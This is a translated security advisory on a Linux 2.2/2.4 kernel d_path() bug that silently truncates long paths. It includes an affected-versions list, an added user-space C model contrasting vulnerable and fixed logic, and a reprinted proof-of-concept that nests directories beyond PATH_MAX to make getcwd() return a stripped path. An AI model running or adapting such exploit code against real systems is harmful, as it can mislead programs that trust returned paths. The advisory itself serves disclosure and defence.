Linux Kernel d_path() Path Truncation Vulnerability

/ns/ld/unix/data/20020804013457.htm

Translated by: 晓澜 <emile_liao@163.net>
   QQ: 42449970
   http://www.unsecret.org
---------------------------------------------

Affected systems:

Linux kernel 2.2
Linux kernel 2.2.1
Linux kernel 2.2.2
Linux kernel 2.2.3
Linux kernel 2.2.4
Linux kernel 2.2.5
Linux kernel 2.2.6
Linux kernel 2.2.7
Linux kernel 2.2.8
Linux kernel 2.2.9
Linux kernel 2.2.10
+ Caldera OpenLinux 2.3
Linux kernel 2.2.11
Linux kernel 2.2.12
Linux kernel 2.2.13
+ S.u.S.E. Linux 6.3
+ S.u.S.E. Linux 6.4
Linux kernel 2.2.14
+ Caldera eDesktop 2.4
+ Caldera eServer 2.3.1
+ RedHat Linux 6.2
Linux kernel 2.2.15
+ MandrakeSoft Corporate Server 1.0.1
+ MandrakeSoft Linux Mandrake 7.1
Linux kernel 2.2.16
+ RedHat Linux 7.0
Linux kernel 2.2.17
+ MandrakeSoft Linux Mandrake 7.2
+ S.u.S.E. Linux 7.0
Linux kernel 2.2.18
+ Wirex Immunix OS 6.2
+ Wirex Immunix OS 7.0
+ Wirex Immunix OS 7.0-Beta
Linux kernel 2.2.19
+ EnGarde Secure Linux 1.0.1
+ MandrakeSoft Linux Mandrake 8.0
+ MandrakeSoft Linux Mandrake 8.0 ppc
+ MandrakeSoft Linux Mandrake 8.1
+ MandrakeSoft Single Network Firewall 7.2
+ S.u.S.E. Linux 6.3
+ S.u.S.E. Linux 6.4
+ S.u.S.E. Linux 7.0
Linux kernel 2.2.20
Linux kernel 2.3
Linux kernel 2.3.99
Linux kernel 2.4
Linux kernel 2.4.1
Linux kernel 2.4.2
+ Caldera OpenLinux Server 3.1
+ Caldera OpenLinux Workstation 3.1
+ RedHat Linux 7.1 alpha
+ RedHat Linux 7.1 i386
Linux kernel 2.4.3
+ MandrakeSoft Linux Mandrake 8.0
+ MandrakeSoft Linux Mandrake 8.0 ppc
Linux kernel 2.4.4
Linux kernel 2.4.5
+ Slackware Linux 8.0
Linux kernel 2.4.6
Linux kernel 2.4.7
+ RedHat Linux 7.2
+ S.u.S.E. Linux 7.1
+ S.u.S.E. Linux 7.2
Linux kernel 2.4.8
+ MandrakeSoft Linux Mandrake 8.1
Linux kernel 2.4.9
+ RedHat Linux 7.1 alpha
+ RedHat Linux 7.1 i386
+ RedHat Linux 7.1 ia64
+ RedHat Linux 7.2 alpha
+ RedHat Linux 7.2 i386
+ RedHat Linux 7.2 ia64
Linux kernel 2.4.10
+ S.u.S.E. Linux 7.3
Linux kernel 2.4.11
Linux kernel 2.4.12
Linux kernel 2.4.13
Linux kernel 2.4.14
Linux kernel 2.4.15
Linux kernel 2.4.16
Linux kernel 2.4.17
Linux kernel 2.4.18

Vulnerability description:

The Linux kernel's d_path() function builds the absolute pathname of a file into a
fixed-size buffer of PAGE_SIZE bytes. Normally a call that cannot complete reports an
error, but when the path is longer than the buffer the affected kernels report nothing
at all: d_path() stops prepending components once the buffer is full and hands back
the partial result. The caller receives a well-formed absolute path whose leading
components are missing, so system calls built on d_path(), getcwd(2) among them,
return a path that looks valid but names a different location than the real one.
Programs that trust that path for access decisions or for building further paths
can be misled.
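
The mechanism described above, shown as an added user-space model that is not the kernel's code and is not part of the original advisory. d_path() copies path components right-to-left into a fixed buffer, walking from the leaf dentry toward the root; here the dentry walk is replaced by an array of component names and the buffer is shrunk to 16 bytes instead of PAGE_SIZE so the truncation is visible (both are assumptions for illustration, as is the constructed path /home/alice/project/secret). d_path_truncating() reproduces the affected kernels' loop, which simply breaks out when the next component no longer fits; d_path_checked() treats that condition as an error and returns NULL with errno set to ENAMETOOLONG, the user-space counterpart of the later kernel fix that makes d_path() return ERR_PTR(-ENAMETOOLONG).

```c
#include <errno.h>
#include <stdio.h>
#include <string.h>

/*
 * Constructed example path, root component first, leaf last:
 *   /home/alice/project/secret   (26 characters, 27 bytes with the NUL)
 */
static const char *demo_comps[] = { "home", "alice", "project", "secret" };
#define NCOMPS ((int)(sizeof(demo_comps) / sizeof(demo_comps[0])))

/*
 * Vulnerable variant: mirrors the d_path() loop of the affected kernels.
 * Components are written right-to-left starting at the end of the buffer.
 * When the next component does not fit, the loop just stops and the partial
 * path is returned, so the caller gets a well-formed absolute path with its
 * leading components missing.
 */
static char *d_path_truncating(const char **comps, int ncomps,
                               char *buf, int buflen)
{
    char *end = buf + buflen;
    char *retval;
    int i;

    *--end = '\0';
    buflen--;
    retval = end - 1;
    *retval = '/';              /* the root alone is "/" */

    for (i = ncomps - 1; i >= 0; i--) {
        int namelen = strlen(comps[i]);

        buflen -= namelen + 1;  /* room for "/" plus the name */
        if (buflen < 0)
            break;              /* silent truncation: this is the bug */
        end -= namelen;
        memcpy(end, comps[i], namelen);
        *--end = '/';
        retval = end;
    }
    return retval;
}

/*
 * Fixed variant: running out of room is an error. Returns NULL with errno set
 * to ENAMETOOLONG instead of a shortened path, so a caller such as getcwd()
 * fails rather than acting on the wrong directory.
 */
static char *d_path_checked(const char **comps, int ncomps,
                            char *buf, int buflen)
{
    char *end = buf + buflen;
    char *retval;
    int i;

    *--end = '\0';
    buflen--;
    retval = end - 1;
    *retval = '/';

    for (i = ncomps - 1; i >= 0; i--) {
        int namelen = strlen(comps[i]);

        buflen -= namelen + 1;
        if (buflen < 0) {
            errno = ENAMETOOLONG;
            return NULL;
        }
        end -= namelen;
        memcpy(end, comps[i], namelen);
        *--end = '/';
        retval = end;
    }
    return retval;
}

/* Build the demo path into a buffer of the requested size (at most 64). */
static char scratch[64];

const char *demo_truncating(int buflen)
{
    return d_path_truncating(demo_comps, NCOMPS, scratch, buflen);
}

const char *demo_checked(int buflen)
{
    return d_path_checked(demo_comps, NCOMPS, scratch, buflen);
}

int main(void)
{
    const char *p;

    /* 16 bytes is too small for the 27 the full path needs */
    printf("vulnerable, 16-byte buffer: %s\n", demo_truncating(16));
    p = demo_checked(16);
    printf("fixed, 16-byte buffer:      %s\n", p ? p : strerror(errno));
    printf("either, 64-byte buffer:     %s\n", demo_checked(64));
    return 0;
}
```

With the 16-byte buffer the vulnerable variant returns "/project/secret": a perfectly plausible absolute path, just not the one the process is actually in. That is exactly what the proof-of-concept below observes when getcwd() succeeds on an affected kernel and prints a path with its leading components stripped.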

Exploit:
The following proof-of-concept code was provided by Wojciech Purczynski <cliph@isec.pl>:

/*
 * 2.2.x/2.4.x Linux kernel d_path proof-of-concept exploit
 *
 * Bug found by cliph
 */

#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <limits.h>
#include <errno.h>
#include <paths.h>
#include <sys/types.h>
#include <sys/stat.h>

/*
 * Note: on Linux 2.2.x PATH_MAX = PAGE_SIZE - 1 that gives us 1 byte for
 * trailing '0'
 */

#define PATH_COMPONENT "123456789abcdef"

/*
 * Abort with a message if the preceding call left errno set.
 * (Named check() rather than err() to avoid clashing with err(3) from <err.h>.)
 */
void check(char *msg)
{
	if (errno) {
		perror(msg);
		exit(1);
	}
}

int main(void)
{
	char buf[PATH_MAX + 1]; /* think of trailing '0' */
	int len;

	errno = 0;

	chdir(_PATH_TMP);
	check("chdir");

	/* show CWD before exploiting the bug */
	getcwd(buf, sizeof(buf));
	check("getcwd #1");
	fprintf(stderr, "CWD=%.40s\n", buf);

	/* creating long directory tree - it must exceed PATH_MAX characters */
	for (len = 0; len <= PATH_MAX; len += strlen(PATH_COMPONENT) + 1) {
		errno = 0;
		mkdir(PATH_COMPONENT, 0700);
		if (errno != EEXIST)
			check("mkdir");
		errno = 0;
		chdir(PATH_COMPONENT);
		check("chdir");
	}

	/*
	 * show CWD after exploiting the bug: on an affected kernel getcwd()
	 * succeeds and returns a path whose leading components have been
	 * silently dropped; a fixed kernel fails here with an error instead
	 */
	getcwd(buf, sizeof(buf));
	check("getcwd #2");
	fprintf(stderr, "CWD=%.40s... [stripped]\n", buf);

	return 0;
}

References:
http://online.securityfocus.com/archive/1/264117